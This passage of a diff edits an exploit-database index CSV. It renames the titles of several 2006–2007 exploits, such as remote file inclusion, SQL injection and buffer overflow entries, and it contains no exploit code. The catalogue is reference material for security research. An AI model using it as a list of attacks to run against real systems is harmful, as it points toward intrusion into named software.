Exploit",2006-03-18,DarkFig,php,webapps,0 1591,platforms/linux/local/1591.py,"Python <= 2.4.2 realpath() Local Stack Overflow Exploit",2006-03-18,"Gotfault Security",linux,local,0 @@ -1385,7 +1385,7 @@ id,file,description,date,author,platform,type,port 1651,platforms/php/webapps/1651.php,"ADODB < 4.70 (tmssql.php) Denial of Service Vulnerability",2006-04-09,rgod,php,webapps,0 1652,platforms/php/webapps/1652.php,"ADODB < 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection Exploit",2006-04-09,rgod,php,webapps,0 1653,platforms/php/webapps/1653.txt,"dnGuestbook <= 2.0 Remote SQL Injection Vulnerabilities",2006-04-09,snatcher,php,webapps,0 -1654,platforms/php/webapps/1654.txt,"Autonomous LAN Party <= 0.98.1.0 Remote File Inclusion Vulnerability",2006-04-09,Codexploder,php,webapps,0 +1654,platforms/php/webapps/1654.txt,"autonomous lan party <= 0.98.1.0 - Remote File Inclusion Vulnerability",2006-04-09,Codexploder,php,webapps,0 1655,platforms/php/webapps/1655.php,"XBrite Members <= 1.1 (id) Remote SQL Injection Exploit",2006-04-09,snatcher,php,webapps,0 1656,platforms/php/webapps/1656.txt,"Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability",2006-04-09,simo64,php,webapps,0 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit",2006-04-09,fingerout,linux,dos,0 @@ -1446,7 +1446,7 @@ id,file,description,date,author,platform,type,port 1724,platforms/php/webapps/1724.pl,"TopList <= 1.3.8 (phpBB Hack) Remote Inclusion Exploit",2006-04-28,FOX_MULDER,php,webapps,0 1725,platforms/php/webapps/1725.pl,"Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit",2006-04-28,n0m3rcy,php,webapps,0 1726,platforms/php/webapps/1726.pl,"Invision Power Board <= 2.1.5 search.php Remote Code Execution Exploit",2006-04-29,"Javier Olascoaga",php,webapps,0 -1727,platforms/php/webapps/1727.txt,"OpenPHPNuke <= 2.3.3 Remote File Inclusion Vulnerability",2006-04-29,[Oo],php,webapps,0 +1727,platforms/php/webapps/1727.txt,"openphpnuke <= 2.3.3 - Remote File Inclusion Vulnerability",2006-04-29,[Oo],php,webapps,0 1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod <= 2.0.2 (phpBB) Remote Inclusion Vulnerability",2006-04-29,[Oo],php,webapps,0 1729,platforms/php/webapps/1729.txt,"Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability",2006-04-29,[Oo],php,webapps,0 1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln",2006-04-30,[Oo],php,webapps,0 @@ -1492,20 +1492,20 @@ id,file,description,date,author,platform,type,port 1778,platforms/php/webapps/1778.txt,"Foing <= 0.7.0 (phpBB) Remote File Inclusion Vulnerability",2006-05-12,"Kurdish Security",php,webapps,0 1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability",2006-05-12,Kacper,php,webapps,0 1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 -1781,platforms/windows/dos/1781.txt,"Outgun <= 1.0.3 bot 2 Multiple Remote Vulnerabilities Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 +1781,platforms/windows/dos/1781.txt,"outgun <= 1.0.3 bot 2 Multiple Vulnerabilities exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 1782,platforms/windows/dos/1782.txt,"Empire <= 4.3.2 (strncat) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 1783,platforms/windows/dos/1783.txt,"Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 -1784,platforms/windows/dos/1784.txt,"Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 +1784,platforms/windows/dos/1784.txt,"raydium <= svn 309 Multiple Vulnerabilities exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source <= 4.2 (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 1787,platforms/windows/remote/1787.py,"freeSSHd <= 1.0.9 Key Exchange Algorithm Buffer Overflow Exploit",2006-05-15,"Tauqeer Ahmad",windows,remote,22 1788,platforms/windows/remote/1788.pm,"PuTTy.exe <= 0.53 (validation) Remote Buffer Overflow Exploit (meta)",2006-05-15,y0,windows,remote,0 1789,platforms/php/webapps/1789.txt,"TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability",2006-05-15,Kacper,php,webapps,0 1790,platforms/php/webapps/1790.txt,"Squirrelcart <= 2.2.0 (cart_content.php) Remote Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0 -1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Auth Bypass Patch/EXE",2006-05-16,redsand,multiple,remote,5900 +1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication - Auth Bypass Patch (EXE)",2006-05-16,redsand,multiple,remote,5900 1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0 1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0 1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900 -1795,platforms/php/webapps/1795.txt,"ezUserManager <= 1.6 Remote File Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0 +1795,platforms/php/webapps/1795.txt,"ezusermanager <= 1.6 - Remote File Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0 1796,platforms/php/webapps/1796.php,"PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit",2006-05-16,rgod,php,webapps,0 1797,platforms/php/webapps/1797.php,"DeluxeBB <= 1.06 (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0 1798,platforms/php/webapps/1798.txt,"Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability",2006-05-17,nukedx,php,webapps,0 @@ -1515,7 +1515,7 @@ id,file,description,date,author,platform,type,port 1802,platforms/multiple/dos/1802.html,"Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit",2006-05-18,"Gianni Amato",multiple,dos,0 1804,platforms/php/webapps/1804.txt,"phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities",2006-05-19,[Oo],php,webapps,0 1805,platforms/php/webapps/1805.pl,"phpListPro <= 2.0.1 (Language) Remote Code Execution Exploit",2006-05-19,[Oo],php,webapps,0 -1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 (*.map file) Local Arbitrary Code Execution Exploit",2006-05-19,Devil-00,windows,local,0 +1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - (.map file) Local Arbitrary Code Execution Exploit",2006-05-19,Devil-00,windows,local,0 1807,platforms/asp/webapps/1807.txt,"Zix Forum <= 1.12 (layid) SQL Injection Vulnerability",2006-05-19,FarhadKey,asp,webapps,0 1808,platforms/php/webapps/1808.txt,"phpMyDirectory <= 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability",2006-05-19,OLiBekaS,php,webapps,0 1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 (CLPath) Remote File Include Vulnerabilities",2006-05-20,Kacper,php,webapps,0 @@ -1649,7 +1649,7 @@ id,file,description,date,author,platform,type,port 1939,platforms/php/webapps/1939.php,"DataLife Engine <= 4.1 Remote SQL Injection Exploit (php)",2006-06-21,RusH,php,webapps,0 1940,platforms/windows/remote/1940.pm,"MS Windows RRAS Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445 1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0 -1942,platforms/php/webapps/1942.txt,"Ralf Image Gallery <= 0.7.4 Multiple Remote Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 +1942,platforms/php/webapps/1942.txt,"ralf image gallery <= 0.7.4 Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 1943,platforms/php/webapps/1943.txt,"Harpia CMS <= 1.0.5 Remote File Include Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0 1944,platforms/windows/local/1944.c,"Microsoft Excel Unspecified Remote Code Execution Exploit",2006-06-22,"naveed afzal",windows,local,0 1945,platforms/php/webapps/1945.pl,"w-Agora <= 4.2.0 (inc_dir) Remote File Include Exploit",2006-06-22,the_day,php,webapps,0 @@ -1799,7 +1799,7 @@ id,file,description,date,author,platform,type,port 2100,platforms/php/webapps/2100.txt,"PHPAuction 2.1 (phpAds_path) Remote File Inclusion Vulnerability",2006-08-01,"Philipp Niedziela",php,webapps,0 2101,platforms/php/webapps/2101.txt,"newsReporter <= 1.1 (index.php) Remote Inclusion Vulnerability",2006-08-01,"Kurdish Security",php,webapps,0 2102,platforms/php/webapps/2102.txt,"Voodoo chat <= 1.0RC1b (file_path) Remote File Inclusion Vulnerability",2006-08-01,SHiKaA,php,webapps,0 -2103,platforms/php/webapps/2103.txt,"k_shoutBox <= 4.4 Remote File Inclusion Vulnerability",2006-08-01,"Kurdish Security",php,webapps,0 +2103,platforms/php/webapps/2103.txt,"k_shoutbox <= 4.4 - Remote File Inclusion Vulnerability",2006-08-01,"Kurdish Security",php,webapps,0 2104,platforms/php/webapps/2104.txt,"k_fileManager <= 1.2 (dwl_include_path) Remote Inclusion Vulnerability",2006-08-01,SHiKaA,php,webapps,0 2105,platforms/php/webapps/2105.php,"XMB <= 1.9.6 (u2uid) Remote SQL Injection Exploit (mq=off)",2006-08-01,rgod,php,webapps,0 2106,platforms/osx/local/2106.pl,"Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (x86)",2006-08-01,"Kevin Finisterre",osx,local,0 @@ -1917,7 +1917,7 @@ id,file,description,date,author,platform,type,port 2221,platforms/php/webapps/2221.txt,"Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0 2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component <= 0.6b Include Vulnerability",2006-08-19,mdx,php,webapps,0 2223,platforms/windows/remote/2223.c,"MS Windows CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 -2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat <= 3.1 (adminlog) Remote File Incude Vulnerability",2006-08-19,SHiKaA,php,webapps,0 +2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat <= 3.1 - (adminlog) Remote File Incude Vulnerability",2006-08-19,SHiKaA,php,webapps,0 2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component <= 1.1 File Include Vulnerability",2006-08-19,mdx,php,webapps,0 2226,platforms/php/webapps/2226.txt,"NES Game and NES System <= c108122 File Include Vulnerabilities",2006-08-20,Kacper,php,webapps,0 2227,platforms/php/webapps/2227.txt,"SportsPHool <= 1.0 (mainnav) Remote File Include Vulnerability",2006-08-20,Kacper,php,webapps,0 @@ -2011,7 +2011,7 @@ id,file,description,date,author,platform,type,port 2315,platforms/php/webapps/2315.txt,"Akarru <= 0.4.3.34 (bm_content) Remote File Include Vulnerability",2006-09-06,ddoshomo,php,webapps,0 2316,platforms/php/webapps/2316.txt,"PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities",2006-09-07,momo26,php,webapps,0 2317,platforms/php/webapps/2317.txt,"SL_Site <= 1.0 (spaw_root) Remote File Include Vulnerability",2006-09-07,Kw3[R]Ln,php,webapps,0 -2318,platforms/php/webapps/2318.txt,"Web Server Creator v0.1 (l) Remote Include Vulnerability",2006-09-07,"Mehmet Ince",php,webapps,0 +2318,platforms/php/webapps/2318.txt,"Web Server Creator 0.1 - (l) Remote Include Vulnerability",2006-09-07,"Mehmet Ince",php,webapps,0 2319,platforms/php/webapps/2319.txt,"Fire Soft Board <= RC 3 (racine) Remote File Include Vulnerability",2006-09-07,ddoshomo,php,webapps,0 2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 (Redirect.bat) Directory Transversal Vulnerability",2006-09-07,"Daniel Clemens",windows,remote,411 2321,platforms/php/webapps/2321.php,"DokuWiki <= 2006-03-09b (dwpage.php) Remote Code Execution Exploit",2006-09-07,rgod,php,webapps,0 @@ -2393,7 +2393,7 @@ id,file,description,date,author,platform,type,port 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability",2006-11-01,securfrog,php,webapps,0 2702,platforms/php/webapps/2702.php,"Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit",2006-11-02,Kacper,php,webapps,0 2703,platforms/php/webapps/2703.txt,"Article System 0.6 (volume.php) Remote File Include Vulnerability",2006-11-02,GregStar,php,webapps,0 -2704,platforms/php/webapps/2704.txt,"FreeWebshop.org Script <= 2.2.2 Multiple Remote Vulnerabilities",2006-11-02,Spiked,php,webapps,0 +2704,platforms/php/webapps/2704.txt,"freewebshop.org script <= 2.2.2 Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0 2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0 2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0 2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0 @@ -2455,7 +2455,7 @@ id,file,description,date,author,platform,type,port 2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability",2006-11-12,ajann,asp,webapps,0 2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta (user_standard.php) Remote File Include Exploit",2006-11-12,DeltahackingTEAM,php,webapps,0 2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 (baseDir) Remote File Include Vulnerabilities",2006-11-12,v1per-haCker,php,webapps,0 -2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 (Local/Upload/Delete) Multiple Remote Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0 +2768,platforms/php/webapps/2768.txt,"contentnow 1.30 (local/upload/delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0 2769,platforms/php/webapps/2769.php,"Quick.Cart <= 2.0 (actions_client/gallery.php) Local File Include Exploit",2006-11-13,Kacper,php,webapps,0 2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver Probe Response SSID Overflow Exploit (meta)",2006-11-13,"H D Moore",windows,remote,0 2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow Exploit (meta)",2006-11-13,"H D Moore",windows,remote,0 @@ -2463,17 +2463,17 @@ id,file,description,date,author,platform,type,port 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager <= 1.3 - (default.asp) Login Bypass Vulnerability",2006-11-13,ajann,asp,webapps,0 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 (vir_Login.asp) Remote Login Bypass Vulnerability",2006-11-13,ajann,asp,webapps,0 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 (installed_config_file) File Include Vulnerabilities",2006-11-13,Firewall,php,webapps,0 -2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 (upload/xss) Multiple Remote Vulnerabilities",2006-11-14,Timq,php,webapps,0 +2776,platforms/php/webapps/2776.txt,"contentnow 1.30 (upload/xss) Multiple Vulnerabilities",2006-11-14,Timq,php,webapps,0 2777,platforms/php/webapps/2777.txt,"Aigaion <= 1.2.1 (DIR) Remote File Include Vulnerabilities",2006-11-14,navairum,php,webapps,0 2778,platforms/php/webapps/2778.txt,"phpPeanuts 1.3 Beta (Inspect.php) Remote File Include Vulnerability",2006-11-14,"Hidayat Sagita",php,webapps,0 2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 (default.asp) Login ByPass SQL Injection Vulnerability",2006-11-14,ajann,asp,webapps,0 2780,platforms/asp/webapps/2780.txt,"NetVIOS <= 2.0 (page.asp) Remote SQL Injection Vulnerability",2006-11-14,ajann,asp,webapps,0 -2781,platforms/asp/webapps/2781.txt,"BlogMe 3.0 (XSS/Auth Bypass) Multiple Remote Vulnerabilities",2006-11-14,"Security Access Point",asp,webapps,0 +2781,platforms/asp/webapps/2781.txt,"blogme 3.0 (xss/auth bypass) Multiple Vulnerabilities",2006-11-14,"Security Access Point",asp,webapps,0 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart Remote Login Bypass Vulnerability",2006-11-14,"Security Access Point",asp,webapps,0 2783,platforms/windows/dos/2783.html,"WinZIP <= 10.0.7245 (FileView ActiveX Control) Stack Overflow PoC",2006-11-14,prdelka,windows,dos,0 2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 (smbclient) Remote Code Execution Exploit",2006-11-14,"Teemu Salmela",multiple,remote,0 2785,platforms/windows/remote/2785.c,"WinZIP <= 10.0.7245 (FileView ActiveX) Remote Buffer Overflow Exploit",2006-11-15,prdelka,windows,remote,0 -2786,platforms/php/webapps/2786.txt,"TorrentFlux <= 2.2 (Create/Exec/Delete) Multiple Remote Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0 +2786,platforms/php/webapps/2786.txt,"torrentflux <= 2.2 (create/exec/delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0 2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit",2006-11-15,"Greg Linares",windows,dos,0 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (libucache.dylib) Privilege Escalation Exploit (OSX)",2006-11-15,"Kevin Finisterre",osx,local,0 2789,platforms/windows/remote/2789.cpp,"MS Windows NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0 @@ -2519,7 +2519,7 @@ id,file,description,date,author,platform,type,port 2839,platforms/php/webapps/2839.txt,"OWLLib 1.0 (OWLMemoryProperty.php) Remote File Include Vulnerability",2006-11-23,DeltahackingTEAM,php,webapps,0 2840,platforms/php/webapps/2840.txt,"PEGames (index.php) Remote File Include Vulnerability",2006-11-23,DeltahackingTEAM,php,webapps,0 2841,platforms/php/webapps/2841.php,"Woltlab Burning Board Lite 1.0.2 decode_cookie() SQL Injection Exploit",2006-11-24,rgod,php,webapps,0 -2842,platforms/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 Blind SQL Injection Exploit",2006-11-23,rgod,php,webapps,0 +2842,platforms/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection Exploit",2006-11-23,rgod,php,webapps,0 2843,platforms/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b (util.php) Remote File Include Exploit",2006-11-24,DeltahackingTEAM,php,webapps,0 2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 (Database Backup/Source Disclosure) Remote Exploit",2006-11-24,DarkFig,php,webapps,0 2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk <= 0.97.3 (details.asp) SQL Injection Vulnerability",2006-11-25,ajann,asp,webapps,0 @@ -2539,7 +2539,7 @@ id,file,description,date,author,platform,type,port 2860,platforms/windows/dos/2860.c,"Quintessential Player <= 4.50.1.82 (Playlist) Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 2861,platforms/windows/dos/2861.c,"Songbird Media Player <= 0.2 Format String Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure Vulnerability",2006-11-28,Lu7k,php,webapps,0 -2863,platforms/php/webapps/2863.php,"Kubix <= 0.7 Multiple Remote Vulnerabilities Exploit",2006-11-29,BlackHawk,php,webapps,0 +2863,platforms/php/webapps/2863.php,"kubix <= 0.7 Multiple Vulnerabilities exploit",2006-11-29,BlackHawk,php,webapps,0 2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 - 1.9b (import-mt.php) Remote File Include Vulnerability",2006-11-29,tarkus,php,webapps,0 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit",2006-11-30,cthulhu,windows,remote,69 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch (ActiveX Control) Command Execution Exploit",2006-11-30,"Tan Chew Keong",windows,remote,0 @@ -2557,7 +2557,7 @@ id,file,description,date,author,platform,type,port 2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC",2006-12-01,"Greg Linares",windows,local,0 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk (XSS/Local File Disclosure) Vulnerabilities",2006-12-01,ajann,asp,webapps,0 2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional (Path Disclosure/Include) Multiple Vulns",2006-12-02,y3dips,php,webapps,0 -2883,platforms/php/webapps/2883.txt,"Simple File Manager 0.24a Multiple Remote Vulnerabilities",2006-12-02,flame,php,webapps,0 +2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0 2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 (search.php) Remote Include Vulnerability",2006-12-02,DeltahackingTEAM,php,webapps,0 2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies <= 1.3.0 Remote File Include Vulnerability",2006-12-02,bd0rk,php,webapps,0 2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 (activate.php) File Include Vulnerabilities",2006-12-03,GregStar,php,webapps,0 @@ -2612,7 +2612,7 @@ id,file,description,date,author,platform,type,port 2937,platforms/php/webapps/2937.php,"extreme-fusion <= 4.02 Remote Code Execution Exploit",2006-12-16,Kacper,php,webapps,0 2938,platforms/php/webapps/2938.htm,"Bandwebsite <= 1.5 (Login) Remote Add Admin Exploit",2006-12-16,H0tTurk-,php,webapps,0 2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks <= 2.05 Remote Inclusion Vulnerability",2006-12-16,ajann,php,webapps,0 -2940,platforms/php/webapps/2940.txt,"mxBB Module Charts <= 1.0.0 Remote File Inclusion Vulnerability",2006-12-16,ajann,php,webapps,0 +2940,platforms/php/webapps/2940.txt,"mxbb module charts <= 1.0.0 - Remote File Inclusion Vulnerability",2006-12-16,ajann,php,webapps,0 2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting <= 1.1.2 Remote FileInclusion Vulnerability",2006-12-16,ajann,php,webapps,0 2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 (RETR) Remote Denial of Service Exploit",2006-12-17,Necro,windows,dos,0 2943,platforms/php/webapps/2943.txt,"Azucar CMS <= 1.3 (admin/index_sitios.php) File Inclusion Vulnerability",2006-12-18,nuffsaid,php,webapps,0 @@ -2653,7 +2653,7 @@ id,file,description,date,author,platform,type,port 2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 (USER) Format String DoS Exploit",2006-12-22,shinnai,windows,dos,0 2979,platforms/php/webapps/2979.txt,"KISGB <= 5.1.1 (authenticate.php) Remote File Include Vulnerability",2006-12-22,mdx,php,webapps,0 2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 (admin/auth.php) Remote Inclusion Vuln",2006-12-22,mdx,php,webapps,0 -2981,platforms/php/webapps/2981.php,"Open Newsletter <= 2.5 Multiple Remote Vulnerabilities Exploit (update)",2006-12-23,BlackHawk,php,webapps,0 +2981,platforms/php/webapps/2981.php,"open newsletter <= 2.5 Multiple Vulnerabilities exploit (update)",2006-12-23,BlackHawk,php,webapps,0 2982,platforms/php/webapps/2982.txt,"3editor CMS <= 0.42 (index.php) Local File Include Vulnerability",2006-12-22,3l3ctric-Cracker,php,webapps,0 2983,platforms/php/webapps/2983.txt,"b2 Blog <= 0.5 (b2verifauth.php) Remote File Include Vulnerability",2006-12-23,mdx,php,webapps,0 2984,platforms/php/webapps/2984.txt,"SH-News 0.93 (misc.php) Remote File Include Exploit",2006-12-23,bd0rk,php,webapps,0 @@ -2689,7 +2689,7 @@ id,file,description,date,author,platform,type,port 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 Remote Upload File / Code Execution Vuln",2006-12-25,CorryL,php,webapps,0 3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 (main) Remote SQL Injection Exploit",2006-12-26,ajann,asp,webapps,0 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 -3017,platforms/php/webapps/3017.php,"PHP-Update <= 2.7 Multiple Remote Vulnerabilities Exploit",2006-12-26,rgod,php,webapps,0 +3017,platforms/php/webapps/3017.php,"php-update <= 2.7 Multiple Vulnerabilities exploit",2006-12-26,rgod,php,webapps,0 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb <= 2.0.1b Remote File Include Vulnerability",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities",2006-12-26,Cr@zy_King,php,webapps,0 3020,platforms/php/webapps/3020.pl,"PHP-Update <= 2.7 (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0 @@ -2704,7 +2704,7 @@ id,file,description,date,author,platform,type,port 3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0 3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 ierpplug.dll Internet Explorer Denial of Service Exploit",2006-12-28,shinnai,windows,dos,0 3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0 -3032,platforms/asp/webapps/3032.txt,"WYWO - InOut Board 1.0 Multiple Remote Vulnerabilities",2006-12-28,ajann,asp,webapps,0 +3032,platforms/asp/webapps/3032.txt,"wywo - inout board 1.0 Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0 3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 (Acronym Mod) Remote SQL Injection Vulnerability",2006-12-28,"the master",php,webapps,0 3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer <= 1.1 Remote Denial of Service Crash Exploit",2006-12-28,shinnai,windows,dos,0 3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 (admin.asp) Login ByPass SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0 @@ -2754,7 +2754,7 @@ id,file,description,date,author,platform,type,port 3080,platforms/osx/dos/3080.rb,"iLife iPhoto Photocast (XML title) Remote Format String PoC",2007-01-04,MoAB,osx,dos,0 3081,platforms/asp/webapps/3081.pl,"DigiRez <= 3.4 (book_id) Remote SQL Injection Exploit",2007-01-04,ajann,asp,webapps,0 3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 (user.php id variable) Remote SQL Injection Vulnerability",2007-01-05,"Michael Brooks",php,webapps,0 -3083,platforms/php/webapps/3083.txt,"iG Shop 1.0 (eval/sql injection) Multiple Remote Vulnerabilities",2007-01-05,"Michael Brooks",php,webapps,0 +3083,platforms/php/webapps/3083.txt,"ig shop 1.0 (eval/sql injection) Multiple Vulnerabilities",2007-01-05,"Michael Brooks",php,webapps,0 3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin <= 7.0.x (acroreader) XSS Vulnerability",2007-01-05,"Stefano Di Paola",windows,remote,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery <= 1.4.10 Remote SQL Injection Exploit",2007-01-05,DarkFig,php,webapps,0 3086,platforms/windows/remote/3086.py,"CA BrightStor ARCserve (tapeeng.exe) Remote Buffer Overflow Exploit",2007-01-05,"Winny Thomas",windows,remote,6502 @@ -2786,7 +2786,7 @@ id,file,description,date,author,platform,type,port 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability",2007-01-10,irvian,php,webapps,0 3114,platforms/php/webapps/3114.txt,"Article System 0.1 (INCLUDE_DIR) Remote File Include Vulnerabilities",2007-01-11,3l3ctric-Cracker,php,webapps,0 -3115,platforms/asp/webapps/3115.txt,"VP-ASP Shopping Cart 6.09 (SQL/XSS) Multiple Remote Vulnerabilities",2007-01-11,ajann,asp,webapps,0 +3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 (sql/xss) Multiple Vulnerabilities",2007-01-11,ajann,asp,webapps,0 3116,platforms/php/webapps/3116.php,"sNews <= 1.5.30 Remote Reset Admin Pass / Command Exec Exploit",2007-01-12,rgod,php,webapps,0 3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 (show.php PollDir) Remote File Include Vulnerability",2007-01-12,"ilker Kandemir",php,webapps,0 3118,platforms/php/webapps/3118.txt,"TLM CMS <= 1.1 